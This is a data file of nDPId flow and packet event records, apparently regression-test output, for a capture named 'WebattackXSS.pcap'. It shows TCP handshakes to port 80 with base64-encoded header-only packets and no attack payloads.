-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1499346993434,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346993434,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QspAAD4GgwasEAABwKgKMs0OAFBi7kPbAAAAAKACchDokQAAAgQFtAQCCAoBOQERAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1499346993435,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346993435,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzQ7bbxEWYu5D3KAScSAmgAAAAgQFtAQCCAoD4tKIATkBEQEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1499346993435,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346993435,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QstAAD4Ggw2sEAABwKgKMs0OAFBi7kPc228RF4AQAOXFhwAAAQEICgE5ARED4tKI"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346994731,"flow_last_seen":1499346994731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346994731,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1499346994731,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346994731,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ErdAAD4GsxmsEAABwKgKMs0cAFAyGBDiAAAAAKACchBLDwAAAgQFtAQCCAoBOQJVAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1499346994731,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346994731,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzRyBtZXkMhgQ46AScSBcpQAAAgQFtAQCCAoD4tPMATkCVQEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1499346994732,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346994732,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ErhAAD4GsyCsEAABwKgKMs0cAFAyGBDjgbWV5YAQAOX7rAAAAQEICgE5AlUD4tPM"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346997314,"flow_last_seen":1499346997314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346997314,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1499346997314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346997314,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZWRAAD4GYGysEAABwKgKMs02AFBhbWG\/AAAAAKACchDIPAAAAgQFtAQCCAoBOQTbAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1499346997314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346997314,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzTaSy6RrYW1hwKAScSC3rwAAAgQFtAQCCAoD4tZSATkE2wEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1499346997315,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346997315,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZWVAAD4GYHOsEAABwKgKMs02AFBhbWHAksukbIAQAOVWtwAAAQEICgE5BNsD4tZS"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346998578,"flow_last_seen":1499346998578,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346998578,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52548,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1499346998578,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346998578,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8K3xAAD4GmlSsEAABwKgKMs1EAFB2Xi1rAAAAAKACchDmVQAAAgQFtAQCCAoBOQYXAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1499346998579,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346998579,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzUQbBzt5dl4tbKAScSC1QwAAAgQFtAQCCAoD4teOATkGFwEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1499346998579,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346998579,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0K31AAD4GmlusEAABwKgKMs1EAFB2Xi1sGwc7eoAQAOVUSwAAAQEICgE5BhcD4teO"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347001111,"flow_last_seen":1499347001111,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347001111,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52574,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1499347001111,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347001111,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8kNhAAD4GNPisEAABwKgKMs1eAFDMzJhIAAAAAKACchAidwAAAgQFtAQCCAoBOQiQAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1499347001111,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347001111,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzV4q6d3azMyYSaAScSA8qAAAAgQFtAQCCAoD4toHATkIkAEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1499347001112,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347001112,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0kNlAAD4GNP+sEAABwKgKMs1eAFDMzJhJKund24AQAOXbrwAAAQEICgE5CJAD4toH"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347002399,"flow_last_seen":1499347002399,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347002399,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52588,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1499347002399,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347002399,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8d7tAAD4GThWsEAABwKgKMs1sAFBA8H5pAAAAAKACchDG4gAAAgQFtAQCCAoBOQnSAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1499347002399,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347002399,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzWx3BXtPQPB+aqAScSD2QAAAAgQFtAQCCAoD4ttJATkJ0gEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1499347002400,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347002400,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0d7xAAD4GThysEAABwKgKMs1sAFBA8H5qdwV7UIAQAOWVSAAAAQEICgE5CdID4ttJ"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":352,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347003695,"flow_last_seen":1499347003695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347003695,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1499347003695,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347003695,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZUVAAD4GYIusEAABwKgKMs16AFBCXW5TAAAAAKACchDUOQAAAgQFtAQCCAoBOQsWAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1499347003695,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347003695,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzXqmA8avQl1uVKAScSCH9QAAAgQFtAQCCAoD4tyNATkLFgEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1499347003696,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347003696,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZUZAAD4GYJKsEAABwKgKMs16AFBCXW5UpgPGsIAQAOUm\/QAAAQEICgE5CxYD4tyN"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347006233,"flow_last_seen":1499347006233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347006233,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52628,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1499347006233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347006233,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WV1AAD4GbHOsEAABwKgKMs2UAFDN5FTMAAAAAKACchBfpAAAAgQFtAQCCAoBOQ2RAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1499347006233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347006233,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzZSBD41szeRUzaAScSBvHQAAAgQFtAQCCAoD4t8HATkNkQEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1499347006234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347006234,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WV5AAD4GbHqsEAABwKgKMs2UAFDN5FTNgQ+NbYAQAOUOJQAAAQEICgE5DZED4t8H"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":379,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347007496,"flow_last_seen":1499347007496,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347007496,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52642,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1499347007496,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347007496,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8xEhAAD4GAYisEAABwKgKMs2iAFDPCcqEAAAAAKACchDnfQAAAgQFtAQCCAoBOQ7MAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1499347007496,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347007496,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzaKR1tjLzwnKhaAScSCZlAAAAgQFtAQCCAoD4uBDATkOzAEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1499347007496,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347007496,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0xElAAD4GAY+sEAABwKgKMs2iAFDPCcqFkdbYzIAQAOU4nAAAAQEICgE5DswD4uBD"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":400,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347010080,"flow_last_seen":1499347010080,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347010080,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52668,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1499347010080,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347010080,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aVxAAD4GXHSsEAABwKgKMs28AFAhFXgOAAAAAKACchDlSAAAAgQFtAQCCAoBORFSAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1499347010080,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347010080,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzbww\/OHGIRV4D6AScSDsuAAAAgQFtAQCCAoD4uLJATkRUgEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":402,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1499347010081,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347010081,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aV1AAD4GXHusEAABwKgKMs28AFAhFXgPMPzhx4AQAOWLvwAAAQEICgE5EVMD4uLJ"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":409,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347011349,"flow_last_seen":1499347011349,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347011349,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52682,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1499347011349,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347011349,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8RzxAAD4GfpSsEAABwKgKMs3KAFCfKlWsAAAAAKACchCISQAAAgQFtAQCCAoBORKQAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1499347011350,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347011350,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzcqa6hS4nypVraAScSDxmwAAAgQFtAQCCAoD4uQHATkSkAEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1499347011350,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347011350,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Rz1AAD4GfpusEAABwKgKMs3KAFCfKlWtmuoUuYAQAOWQowAAAQEICgE5EpAD4uQH"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347012617,"flow_last_seen":1499347012617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347012617,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52696,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1499347012617,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347012617,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8mKRAAD4GLSysEAABwKgKMs3YAFAU4YtpAAAAAKACchDbigAAAgQFtAQCCAoBORPNAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1499347012617,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347012617,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzdgtNmaCFOGLaqAScSBfigAAAgQFtAQCCAoD4uVEATkTzQEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1499347012618,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347012618,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0mKVAAD4GLTOsEAABwKgKMs3YAFAU4YtqLTZmg4AQAOX+kQAAAQEICgE5E80D4uVE"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347015165,"flow_last_seen":1499347015165,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347015165,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52722,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 